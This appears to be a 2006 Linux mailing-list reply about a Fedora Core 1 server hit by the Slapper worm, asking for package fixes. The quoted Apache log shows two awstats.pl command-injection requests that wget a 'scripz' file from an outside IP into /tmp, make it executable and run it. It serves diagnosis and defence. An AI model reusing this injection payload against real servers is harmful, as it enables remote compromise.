slapper worm

[James Kosin]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Michael Mansour wrote:
> Hi guys,
> 
> I have an FC1 machine which got infected twice with the slapper worm, and then
> started DOS attacking a large vendor.
> 
> I've stopped slapper in its tracks with a couple of changes to FC1, but in
> analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache
> SSL server which I've now turned off), I see the following bit of interest in
> my apache access_log:
> 
> 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
> /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
>  HTTP/1.1"
>  403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
> /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
>  HTTP/1.1"
>  404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> 
> These "scripz" files end up going into /tmp, being compiled with gcc, renamed
> to "httpd" and run as that.
> 
> I'm using:
> 
> perl-5.8.3-17.4.legacy
> httpd-2.0.51-1.9.legacy
> openssl-0.9.7a-33.13.legacy
> 
> Are there any updates FL can do to any of the packages to fix/block slapper
> from an FC1 machine?
> 
> Michael.
> 


Michael,

Try my version of httpd here:
http://support.intcomgrp.com/~jkosin

It has been effective against the worm so far.

James Kosin
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFD1T+ukNLDmnu1kSkRAv20AJ0d7pl7B6zAOZb+OmhkiiKG/Fpp1ACfcnmE
gJoc286M9LvSAXn2cjXHEok=
=5ZOF
-----END PGP SIGNATURE-----
-- 
Scanned by ClamAV - http://www.clamav.net